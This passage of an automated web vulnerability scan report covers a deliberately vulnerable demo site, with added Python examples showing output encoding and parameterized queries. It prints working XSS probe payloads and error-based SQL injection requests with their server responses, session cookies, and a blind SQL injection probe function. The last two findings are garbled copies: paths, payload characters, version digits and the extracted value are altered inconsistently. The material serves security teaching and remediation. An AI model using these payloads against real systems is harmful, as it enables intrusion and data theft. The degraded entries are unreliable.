There are many different attacks that can be leveraged through the use of XSS, including:
- Hijacking the user's active session
- Changing the look of the page within the victim's browser
- Mounting a successful phishing attack
- Intercepting data and performing man-in-the-middle attacks
Remedy
This issue occurs because the browser interprets the input as active HTML, JavaScript or VBScript. To avoid this, all input to the application should be validated and all output should be encoded. Output must be encoded according to the output format and the location in which it is rendered.
A number of well-structured whitelist and encoding libraries are available for many environments; good examples include the OWASP Reform and Microsoft Anti-Cross-site Scripting libraries.
Remedy References
[ASP.NET] Microsoft Anti-XSS Library
OWASP XSS Prevention Cheat Sheet
External References
XSS Cheat Sheet
OWASP - Cross-site Scripting
XSS Shell
XSS Tunnelling
Classification
OWASP 2010-A2, OWASP 2013-A3, PCI v2.0-6.5.7, PCI v3.0-6.5.7, CWE-79, CAPEC-19, WASC-08
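The remedy text for findings 4 and 9 says "encode according to the output format and location" without showing what that means in practice. The code below is an added example, not from the report or from the Supercar Showdown site: it implements the three encoders a page like /Supercar/3 needs (HTML text, quoted attribute, JavaScript string literal) and runs them over the report's own two payloads, the stored `"><net sparker=...>` that landed inside a `<td>` in finding 4.1 and the `'"--></style></scRipt><scRipt>...` probe from findings 9.1 and 9.2. The row and script templates and all function names are hypothetical; the site's real view markup is not in the report.

```python
import html
import json

# Payloads copied from the report's evidence: the stored one that landed in a
# <td> on /Supercar/3 (finding 4.1) and the probe sent to /api/vote and
# /api/admin (findings 9.1 and 9.2).
STORED_PAYLOAD = '"><net sparker=netsparker(0x00043F)>'
PROBE_PAYLOAD = '\'"--></style></scRipt><scRipt>netsparker(0x000437)</scRipt>'


def encode_for_html_text(value):
    """Encode for an HTML text node (between tags), e.g. the <td> contents.

    html.escape with quote=True turns & < > " ' into entities, so the HTML
    tokenizer never sees a tag boundary inside user data.
    """
    return html.escape(value, quote=True)


def encode_for_html_attribute(value):
    """Encode for an attribute value; the caller MUST also quote the attribute.

    An unquoted attribute ends at the first space, so a value such as
    STORED_PAYLOAD could still add attributes if the template wrote
    title=value without quotes, even with < and > encoded.
    """
    return html.escape(value, quote=True)


def encode_for_js_string(value):
    """Encode for a JavaScript string literal inside an inline <script>.

    json.dumps yields a quoted, escaped JS string literal. The extra
    replacement stops a value containing </script> from terminating the
    script block, because the HTML parser finds that closing tag before any
    JavaScript runs. JSON (and JS) accept "\\/" as an escape for "/".
    """
    return json.dumps(value).replace("</", "<\\/")


def decode_js_string(literal):
    """Inverse of encode_for_js_string, used to show nothing was lost."""
    return json.loads(literal)


def render_comment_row(author, comment):
    """Hypothetical corrected comment row for a /Supercar/{id} page."""
    return '<tr><td>{}</td><td title="{}">{}</td></tr>'.format(
        encode_for_html_text(author),
        encode_for_html_attribute(comment),
        encode_for_html_text(comment),
    )


def render_search_script(search_term):
    """Hypothetical inline script that echoes a search term into jQuery."""
    return '<script>$("#searchTerm").val({});</script>'.format(
        encode_for_js_string(search_term)
    )


def tag_count(markup):
    """Number of '<' in the output. When encoding worked this equals the
    template's own tag count, since every '<' from user data became '&lt;'."""
    return markup.count("<")


if __name__ == "__main__":
    print(render_comment_row("Troy Hunt", STORED_PAYLOAD))
    print(render_search_script(PROBE_PAYLOAD))
```

In ASP.NET MVC, Razor's `@` syntax applies HTML encoding by default and `Html.Raw` is the call that bypasses it; the AntiXSS library referenced by the report adds `AntiXssEncoder` with per-context encoders (HtmlEncode, HtmlAttributeEncode, JavaScriptStringEncode). Finding 9.1's response is `Content-Type: application/json`, where a browser will not execute the reflected markup unless it MIME-sniffs; sending `X-Content-Type-Options: nosniff` on API responses removes that avenue, but the encoding fix above is what actually closes the bug.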
9.1 /api/vote
http://hackyourselffirst.troyhunt.com/api/vote
Parameters:
Parameter   Type   Value
userId      POST   1
supercarId  POST   3
comments    POST   '"--></style></scRipt><scRipt>netsparker(0x000437)</scRipt>
Notes: Due to the Content-Type header of the response, exploitation of this vulnerability might not be possible in all browsers, or might not be possible at all. The Content-Type header indicates that there is a possibility of exploitation by changing the attack; however, Netsparker does not support confirming these issues, so you need to confirm this problem manually. Generally, lack of filtering in the response can cause cross-site scripting vulnerabilities in browsers that perform MIME sniffing, such as Internet Explorer. In this instance the response is a 500 with Content-Type: application/json whose body is a SqlException message, so the immediate defect in the comments parameter is the confirmed SQL injection (finding 2.1); the reflected payload in the JSON error is a consequence of that, and X-Content-Type-Options: nosniff on JSON responses takes sniffing off the table.
Request:
POST /api/vote HTTP/1.1
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.170 Safari/537.36
Accept: */*
Origin: http://hackyourselffirst.troyhunt.com
Referer: http://hackyourselffirst.troyhunt.com/Supercar/3
X-Requested-With: XMLHttpRequest
Accept-Language: en-us,en;q=0.5
X-Scanner: Netsparker
Host: hackyourselffirst.troyhunt.com
Cookie: ASP.NET_SessionId=eykomas2qwtytb2b4i3u3rvj; VisitStart=8/25/2014 10:57:52 PM; AuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D; Password=Mw==; Email=netsparker@example.com; ARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29
Accept-Encoding: gzip, deflate
Content-Length: 90
Content-Type: application/x-www-form-urlencoded; charset=UTF-8

userId=1&supercarId=3&comments='"--></style></scRipt><scRipt>netsparker(0x000437)</scRipt>

Response:
HTTP/1.1 500 Internal Server Error
Cache-Control: no-cache
Date: Mon, 25 Aug 2014 23:20:47 GMT
Pragma: no-cache
Server: Microsoft-IIS/8.0
X-XSS-Protection: 0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Content-Length: 2985
Content-Type: application/json; charset=utf-8
Expires: -1

{"Message":"An error has occurred.","ExceptionMessage":"Unclosed quotation mark after the character string '\"--></style></scRipt><scRipt>netsparker(0x000437)</scRipt>)'.\r\nIncorrect syntax near '\"--></style></scRipt><scRipt>netsparker(0x000437)</scRipt>)'.","ExceptionType":"System.Data.SqlClient.SqlException","StackTrace":"   at System.Data.SqlClient.SqlConnection.OnError(SqlException exception, Boolean breakConnection, Action`1 wrapCloseInAction)\r\n   at System.Data.SqlClient.SqlInternalConnection.OnError(SqlException exception, Boolean breakConnection, Action`1 wrapCloseInAction)\r\n   at System.Data.SqlClient.TdsParser.ThrowExceptionAndWarning(TdsParserStateObject stateObj, Boolean callerHasConnectionLock, Boolean asyncClose)\r\n   at System.Data.SqlClient.TdsParser.TryRun(RunBehavior runBehavior, SqlCommand cmdHandler, SqlDataReader dataStream, BulkCopySimpleResultSet bulkCopyHandler, TdsParserStateObject stateObj, Boolean& dataReady)\r\n   at System.Data.SqlClient.SqlCommand.RunExecuteNonQueryTds(String methodName, Boolean async, Int32 timeout, Boolean asyncWrite)\r\n   at System.Data.SqlClient.SqlCommand.InternalExecuteNonQuery(TaskCompletionSource`1 completion, String methodName, Boolean sendToPipe, Int32 timeout, Boolean asyncWrite)\r\n   at System.Data.SqlClient.SqlCommand.ExecuteNonQuery()\r\n   at Web.Controllers.VoteController.Post(Vote vote)\r\n   at lambda_method(Closure , Object , Object[] )\r\n   at System.Web.Http.Controllers.ReflectedHttpActionDescriptor.ActionExecutor.<>c__DisplayClass10.<GetExecutor>b__9(Object instance, Object[] methodParameters)\r\n   at System.Web.Http.Controllers.Re
flectedHttpActionDescriptor.ActionExecutor.Execute(Object instanc…
9.2 /api/admin
http://hackyourselffirst.troyhunt.com/api/admin?nsextt='%22--%3E%3C/style%3E%3C/scRipt…
Parameters:
Parameter   Type   Value
nsextt      GET    '"--></style></scRipt><scRipt>netsparker(0x0002E0)</scRipt>
Notes: Due to the Content-Type header of the response, exploitation of this vulnerability might not be possible in all browsers, or might not be possible at all. The Content-Type header indicates that there is a possibility of exploitation by changing the attack; however, Netsparker does not support confirming these issues, so you need to confirm this problem manually. Generally, lack of filtering in the response can cause cross-site scripting vulnerabilities in browsers that perform MIME sniffing, such as Internet Explorer.
Request:
GET /api/admin?nsextt='%22--%3E%3C/style%3E%3C/scRipt%3E%3CscRipt%3Enetsparker(0x0002E0)%3C/scRipt%3E HTTP/1.1
Cache-Control: no-cache
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.170 Safari/537.36
Accept-Language: en-us,en;q=0.5
X-Scanner: Netsparker
Host: hackyourselffirst.troyhunt.com
Cookie: ASP.NET_SessionId=eykomas2qwtytb2b4i3u3rvj; VisitStart=8/25/2014 10:57:52 PM; AuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D; Password=Mw==; Email=netsparker@example.com; ARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29
Accept-Encoding: gzip, deflate
CRITICAL: 5 total, 5 confirmed
2 SQL Injection
Netsparker identified an SQL injection, which occurs when data input by a user is interpreted as an SQL command rather than as normal data by the back-end database.
This is an extremely common vulnerability and its successful exploitation can have critical implications.
Netsparker confirmed the vulnerability by executing a test SQL query on the back-end database.
Impact
Depending on the back-end database, the database connection settings and the operating system, an attacker can mount one or more of the following attacks successfully:
- Reading, updating and deleting arbitrary data or tables from the database
- Executing commands on the underlying operating system
Actions to Take
1. See the remedy for the solution.
2. If you are not using a database access layer (DAL), consider using one. This will help you centralize the fix. You can also use an ORM (object relational mapping); most ORM systems use only parameterized queries, which removes the whole class of SQL injection problems.
3. Locate all of the dynamically generated SQL queries and convert them to parameterized queries. (If you decide to use a DAL/ORM, change all legacy code to use these new libraries.)
4. Use your web logs and application logs to see whether there were any previous but undetected attacks on this resource.
Remedy
A robust method for mitigating the threat of SQL injection-based vulnerabilities is to use parameterized queries (prepared statements). Almost all modern languages provide built-in libraries for this. Wherever possible, do not create dynamic SQL queries or SQL queries with string concatenation. Note that identifiers such as the sort column carried in the orderBy/orderby parameters of the instances below cannot be passed as query parameters; map such values onto a fixed allow-list of column names in code instead of concatenating them.
Required Skills for Successful Exploitation
There are numerous freely available tools to exploit SQL injection vulnerabilities. This is a complex area with many dependencies; however, it should be noted that the numerous resources available in this area have raised both attacker awareness of the issues and their ability to discover and leverage them. SQL injection is one of the most common web application vulnerabilities.
External References
OWASP SQL injection
SQL injection Cheat Sheet
Remedy References
MSDN - Protect From SQL injection in ASP.NET
Classification
OWASP 2010-A1, OWASP 2013-A1, PCI v2.0-6.5.1, PCI v3.0-6.5.1, CWE-89, CAPEC-66, WASC-19
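The instances below show two shapes of the same bug: a string value (`comments` on /api/vote) closed with `'+ (select ...) +'` so the database's answer is concatenated into the stored comment, and an identifier (`orderBy` on /Supercar/Leaderboard and `orderby` on /Make/N) where the attacker controls the ORDER BY expression and can extract data one boolean at a time through the row order. The code below is an added example, not from the report or from the Supercar Showdown code base: it reproduces both shapes against an in-memory SQLite database and shows the two different fixes, a parameterized INSERT for the value and an allow-list for the identifier. The schema, table names and function names are assumptions (the real site's stack trace only tells us that Web.Controllers.VoteController.Post ends in SqlCommand.ExecuteNonQuery). SQLite laces the `convert(int, ...)` error trick the scanner used, so the value injection uses `||` concatenation and the identifier injection uses `ORDER BY CASE`, which is exactly the technique behind the Blind SQL Injection entries on the orderby parameters.

```python
import sqlite3


def make_db():
    """Constructed stand-in for the Supercar Showdown schema (assumed)."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE supercar (id INTEGER PRIMARY KEY, name TEXT, votes INTEGER);
        CREATE TABLE vote (id INTEGER PRIMARY KEY, user_id INTEGER,
                           supercar_id INTEGER, comments TEXT);
        INSERT INTO supercar VALUES (1, 'Aventador', 30), (2, 'Veyron', 10), (3, 'Huayra', 20);
    """)
    return conn


# --- vulnerable: string concatenation, the pattern behind findings 2.1 to 2.4 ---

def post_vote_vulnerable(conn, user_id, supercar_id, comments):
    """Mirrors a controller that builds the INSERT by concatenation."""
    sql = ("INSERT INTO vote (user_id, supercar_id, comments) "
           "VALUES (%s, %s, '%s')" % (user_id, supercar_id, comments))
    conn.execute(sql)


def leaderboard_vulnerable(conn, order_by):
    """Mirrors /Supercar/Leaderboard?orderBy=... with the column pasted in."""
    return [row[0] for row in conn.execute("SELECT name FROM supercar ORDER BY " + order_by)]


def blind_probe(conn, condition_sql):
    """Boolean-based blind extraction through the vulnerable ORDER BY: when the
    condition is true the rows come back sorted by name, otherwise by votes.
    Any true/false question about the database can be asked this way, which
    is how the scanner's Blind SQL Injection findings work."""
    return leaderboard_vulnerable(conn, "(CASE WHEN (%s) THEN name ELSE votes END)" % condition_sql)


# --- hardened ---

def post_vote_safe(conn, user_id, supercar_id, comments):
    """Parameterized INSERT: the driver sends the comment as data, never SQL."""
    conn.execute("INSERT INTO vote (user_id, supercar_id, comments) VALUES (?, ?, ?)",
                 (int(user_id), int(supercar_id), comments))


# Identifiers cannot be bound as parameters, so map the request value onto a
# fixed set of column names and reject anything else.
ALLOWED_ORDER = {"name": "name", "votes": "votes"}


def leaderboard_safe(conn, order_by, asc=True):
    column = ALLOWED_ORDER.get(order_by.lower())
    if column is None:
        raise ValueError("unknown sort column: %r" % order_by)
    sql = "SELECT name FROM supercar ORDER BY %s %s" % (column, "ASC" if asc else "DESC")
    return [row[0] for row in conn.execute(sql)]


def stored_comments(conn):
    return [row[0] for row in conn.execute("SELECT comments FROM vote ORDER BY id")]


def db_version(conn):
    return conn.execute("SELECT sqlite_version()").fetchone()[0]


if __name__ == "__main__":
    conn = make_db()
    payload = "' || (SELECT sqlite_version()) || '"   # SQLite analogue of '+ (select ...) +'
    post_vote_vulnerable(conn, 1, 3, payload)
    post_vote_safe(conn, 1, 3, payload)
    print(stored_comments(conn))          # version string, then the literal payload
    print(blind_probe(conn, "1=1"), blind_probe(conn, "1=2"))
```

The same split applies in ASP.NET: SqlCommand.Parameters carries the comment text, while the sort column is looked up in a dictionary before it is ever placed in the SQL string.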
2.1 /api/vote CONFIRMED
http://hackyourselffirst.troyhunt.com/api/vote
Parameters:
Parameter   Type   Value
userId      POST   1
supercarId  POST   3
comments    POST   '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+C…
Extracted Data: microsoft sql azure (rtm) - 11.0.9222.17 \n\taug 20 2014 22:37:56 \n\tcopyright (c) microsoft corporation\n…
Request:
POST /api/vote HTTP/1.1
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.170 Safari/537.36
Accept: */*
Origin: http://hackyourselffirst.troyhunt.com
Referer: http://hackyourselffirst.troyhunt.com/Supercar/3
X-Requested-With: XMLHttpRequest
Accept-Language: en-us,en;q=0.5
X-Scanner: Netsparker
Host: hackyourselffirst.troyhunt.com
Cookie: ASP.NET_SessionId=eykomas2qwtytb2b4i3u3rvj; VisitStart=8/25/2014 10:57:52 PM; AuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D; Password=Mw==; Email=netsparker@example.com; ARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29
Accept-Encoding: gzip, deflate
Content-Length: 209
Content-Type: application/x-www-form-urlencoded; charset=UTF-8

userId=1&supercarId=3&comments=%27%2b+(select+convert(int%2cCHAR(95)%2bCHAR(33)%2bCHAR(64)%2bCHAR(50)%2bCHAR(100)%2bCHAR(105)%2bCHAR(108)%2bCHAR(101)%2bCHAR(109)%2bCHAR(109)%2bCHAR(97))+FROM+syscolumns)+%2b%27

Response:
…P.NET
Content-Length: 2867
Content-Type: application/json; charset=utf-8
Expires: -1

{"Message":"An error has occurred.","ExceptionMessage":"Conversion failed when converting the varchar value '_!@2dilemma' to data type int.","ExceptionType":"System.Data.SqlClient.SqlException","StackTrace":"   at System.Data.SqlClient.SqlConnection.OnError(SqlException exception, Boolean breakConnection, Action`1 wrap…
2.2 /Supercar/Leaderboard CONFIRMED
http://hackyourselffirst.troyhunt.com/Supercar/Leaderboard?orderBy=(select+convert(int%2cCHAR(95)%2b…
Parameters:
Parameter   Type   Value
orderBy     GET    (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR…
asc         GET    false
Extracted Data: microsoft sql azure (rtm) - 11.0.9222.17 <br> aug 20 2014 22:37:56 <br> copyright (c) microsoft corporation<br>…
Request:
GET /Supercar/Leaderboard?orderBy=(select+convert(int%2cCHAR(95)%2bCHAR(33)%2bCHAR(64)%2bCHAR(50)%2bCHAR(100)%2bCHAR(105)%2bCHAR(108)%2bCHAR(101)%2bCHAR(109)%2bCHAR(109)%2bCHAR(97))+FROM+syscolumns)&asc=false HTTP/1.1
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.170 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Referer: http://hackyourselffirst.troyhunt.com/Supercar/Leaderboard
Accept-Language: en-us,en;q=0.5
X-Scanner: Netsparker
Host: hackyourselffirst.troyhunt.com
Cookie: ASP.NET_SessionId=eykomas2qwtytb2b4i3u3rvj; VisitStart=8/25/2014 10:57:52 PM; AuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D; Password=Mw==; Email=netsparker@example.com; ARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29
Accept-Encoding: gzip, deflate
Response:
…30319
X-Powered-By: ASP.NET
Content-Length: 14292
Content-Type: text/html; charset=utf-8

<!DOCTYPE html><html><head><title>Conversion failed when converting the varchar value '_!@2dilemma' to data type int.</title><meta name="viewport" content="width=device-width" /><style>body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;}
…<body bgcolor="white">
<span><H1>Server Error in '/' Application.<hr width=100% size=1 color=silver></H1>
<h2> <i>Conversion failed when converting the varchar value '_!@2dilemma' to data type int.</i> </h2></span>
<font face="Arial, Helvetica, Geneva, SunSans-Regular, sans-serif ">
<b> Description: </b>An unhandled exception occurred during the …e error and where it originated in the code.
<br><br>
<b> Exception Details: </b>System.Data.SqlClient.SqlException: Conversion failed when converting the varchar value '_!@2dilemma' to data type int.<br><br>
<b>Source Error:</b> <br><br>
<table width=100% bgcolor="#ffffcc"><tr><td><code>
…e width=100% bgcolor="#ffffcc"><tr><td><code><pre>
[SqlException (0x80131904): Conversion failed when converting the varchar value &#39;_!@2dilemma&#39; to data type int.]
   System.Data.SqlClient.SqlConnection.OnError(SqlException exception, Boolean breakConnection, Action`1 wrapCloseInAction) +1787814
   System.Data.SqlClient.SqlInternalConn…osoft .NET Framework Version:4.0.30319; ASP.NET Version:4.0.30319.36213
</font>
</body></html><!-- [SqlException]: Conversion failed when converting the varchar value &#39;_!@2dilemma&#39; to data type int.
   at System.Data.SqlClient.SqlConnection.OnError(SqlException exception, Boolean breakConnection, Action`1 wrapCloseInAction)
   at System.Data.SqlClient.SqlInternalConnecti…
2.3 /Make/2 CONFIRMED
http://hackyourselffirst.troyhunt.com/Make/2?orderby=(select+convert(int%2cCHAR(95)%2bCHAR(33)%2bCHA…
Parameters:
Parameter   Type   Value
orderby     GET    (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR…
Extracted Data: microsoft sql azure (rtm) - 11.0.9222.17 <br> aug 20 2014 22:37:56 <br> copyright (c) microsoft corporation<br>…
Request:
GET /Make/2?orderby=(select+convert(int%2cCHAR(95)%2bCHAR(33)%2bCHAR(64)%2bCHAR(50)%2bCHAR(100)%2bCHAR(105)%2bCHAR(108)%2bCHAR(101)%2bCHAR(109)%2bCHAR(109)%2bCHAR(97))+FROM+syscolumns) HTTP/1.1
Cache-Control: no-cache
Referer: http://hackyourselffirst.troyhunt.com/
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.170 Safari/537.36
Accept-Language: en-us,en;q=0.5
X-Scanner: Netsparker
Host: hackyourselffirst.troyhunt.com
Cookie: ASP.NET_SessionId=eykomas2qwtytb2b4i3u3rvj; VisitStart=8/25/2014 10:57:52 PM; AuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D; Password=Mw==; Email=netsparker@example.com; ARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29
Accept-Encoding: gzip, deflate
Response:
…30319
X-Powered-By: ASP.NET
Content-Length: 14154
Content-Type: text/html; charset=utf-8

<!DOCTYPE html><html><head><title>Conversion failed when converting the varchar value '_!@2dilemma' to data type int.</title><meta name="viewport" content="width=device-width" /><style>body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;}
…<body bgcolor="white">
<span><H1>Server Error in '/' Application.<hr width=100% size=1 color=silver></H1>
<h2> <i>Conversion failed when converting the varchar value '_!@2dilemma' to data type int.</i> </h2></span>
<font face="Arial, Helvetica, Geneva, SunSans-Regular, sans-serif ">
<b> Description: </b>An unhandled exception occurred during the …e error and where it originated in the code.
<br><br>
<b> Exception Details: </b>System.Data.SqlClient.SqlException: Conversion failed when converting the varchar value '_!@2dilemma' to data type int.<br><br>
<b>Source Error:</b> <br><br>
<table width=100% bgcolor="#ffffcc"><tr><td><code>
…e width=100% bgcolor="#ffffcc"><tr><td><code><pre>
[SqlException (0x80131904): Conversion failed when converting the varchar value &#39;_!@2dilemma&#39; to data type int.]
   System.Data.SqlClient.SqlConnection.OnError(SqlException exception, Boolean breakConnection, Action`1 wrapCloseInAction) +1787814
   System.Data.SqlClient.SqlInternalConn…osoft .NET Framework Version:4.0.30319; ASP.NET Version:4.0.30319.36213
</font>
</body></html><!-- [SqlException]: Conversion failed when converting the varchar value &#39;_!@2dilemma&#39; to data type int.
   at System.Data.SqlClient.SqlConnection.OnError(SqlException exception, Boolean breakConnection, Action`1 wrapCloseInAction)
   at System.Data.SqlClient.SqlInternalConnecti…
2.4 /Make3 CONFIRMED http://hackyourselffirst.troyhunt.com/Make3?orderby=(select+convert(int%2cCHAR(95)%2bCHAR(33)%2bCHA

Parameters:
Parameter | Type | Value
orderby | GET | (select convert(int,CHAR(95) CHAR(33)CHAR(64) CHAR(50) CHAR(100)CHAR(105) CHAR(108) CHAR(101)CHAR

Extracted Data: microsoft sql azure (rtm) - 110922217 <br> aug 20 2014 22:37:56 <br> copyright (c) microsoft corporation<br>

Request:
GET /Make3?orderby=(select+convert(int%2cCHAR(95)%2bCHAR(33)%2bCHAR(64)%2bCHAR(50)%2bCHAR(100)%2bCHAR(105)%2bCHAR(108)%2bCHAR(101)%2bCHAR(109)%2bCHAR(109)%2bCHAR(97))+FROM+syscolumns) HTTP/1.1
Cache-Control: no-cache
Referer: http://hackyourselffirst.troyhunt.com/
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.170 Safari/537.36
Accept-Language: en-us,en;q=0.5
X-Scanner: Netsparker
Host: hackyourselffirst.troyhunt.com
Cookie: ASP.NET_SessionId=eykomas2qwtytb2b4i3u3rvj; VisitStart=8/25/2014 10:57:52 PM; AuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D; Password=Mw==; Email=netsparker@example.com; ARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29
Accept-Encoding: gzip, deflate

Response:
…30319
X-Powered-By: ASP.NET
Content-Length: 14154
Content-Type: text/html; charset=utf-8

<!DOCTYPE html><html><head><title>Conversion failed when converting the varchar value '_2dilemma' to data type int.</title><meta name="viewport" content="width=device-width" /><style>body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;}
…<body bgcolor="white">
<span><H1>Server Error in Application.<hr width=100% size=1 color=silver></H1>
<h2> <i>Conversion failed when converting the varchar value '_2dilemma' to data type int.</i> </h2></span>
<font face="Arial, Helvetica, Geneva, SunSans-Regular, sans-serif ">
<b> Description: </b>An unhandled exception occurred during the …e error and where it originated in the code.
<br><br>
<b> Exception Details: </b>System.Data.SqlClient.SqlException: Conversion failed when converting the varchar value '_2dilemma' to data type int.<br><br>
<b>Source Error:</b> <br><br>
<table width=100% bgcolor="#ffffcc"><tr><td><code>
…e width=100% bgcolor="#ffffcc"><tr><td><code><pre>
[SqlException (0x80131904): Conversion failed when converting the varchar value '_2dilemma' to data type int.]
   System.Data.SqlClient.SqlConnection.OnError(SqlException exception, Boolean breakConnection, Action`1 wrapCloseInAction) +1787814
   System.Data.SqlClient.SqlInternalConn…osoft .NET Framework Version:4.0.30319; ASP.NET Version:4.0.30319.36213
</font>
</body></html><!-- [SqlException]: Conversion failed when converting the varchar value '_2dilemma' to data type int.
   at System.Data.SqlClient.SqlConnection.OnError(SqlException exception, Boolean breakConnection, Action`1 wrapCloseInAction)
   at System.Data.SqlClient.SqlInternalConnecti…
2.5 /Make1 CONFIRMED http://hackyourselffirst.troyhunt.com/Make1?orderby=(select+convert(int%2cCHAR(95)%2bCHAR(33)%2bCHA

Parameters:
Parameter | Type | Value
orderby | GET | (select convert(int,CHAR(95) CHAR(33)CHAR(64) CHAR(50) CHAR(100)CHAR(105) CHAR(108) CHAR(101)CHAR

Extracted Data: microsoft sql azure (rtm) - 110922217 <br> aug 20 2014 22:37:56 <br> copyright (c) microsoft corporation<br>

Request:
GET /Make1?orderby=(select+convert(int%2cCHAR(95)%2bCHAR(33)%2bCHAR(64)%2bCHAR(50)%2bCHAR(100)%2bCHAR(105)%2bCHAR(108)%2bCHAR(101)%2bCHAR(109)%2bCHAR(109)%2bCHAR(97))+FROM+syscolumns) HTTP/1.1
Cache-Control: no-cache
Referer: http://hackyourselffirst.troyhunt.com/
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.170 Safari/537.36
Accept-Language: en-us,en;q=0.5
X-Scanner: Netsparker
Host: hackyourselffirst.troyhunt.com
Cookie: ASP.NET_SessionId=eykomas2qwtytb2b4i3u3rvj; VisitStart=8/25/2014 10:57:52 PM; AuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D; Password=Mw==; Email=netsparker@example.com; ARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29
Accept-Encoding: gzip, deflate

Response:
…30319
X-Powered-By: ASP.NET
Content-Length: 14154
Content-Type: text/html; charset=utf-8

<!DOCTYPE html><html><head><title>Conversion failed when converting the varchar value '_2dilemma' to data type int.</title><meta name="viewport" content="width=device-width" /><style>body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;}
…<body bgcolor="white">
<span><H1>Server Error in Application.<hr width=100% size=1 color=silver></H1>
<h2> <i>Conversion failed when converting the varchar value '_2dilemma' to data type int.</i> </h2></span>
<font face="Arial, Helvetica, Geneva, SunSans-Regular, sans-serif ">
<b> Description: </b>An unhandled exception occurred during the …e error and where it originated in the code.
<br><br>
<b> Exception Details: </b>System.Data.SqlClient.SqlException: Conversion failed when converting the varchar value '_2dilemma' to data type int.<br><br>
<b>Source Error:</b> <br><br>
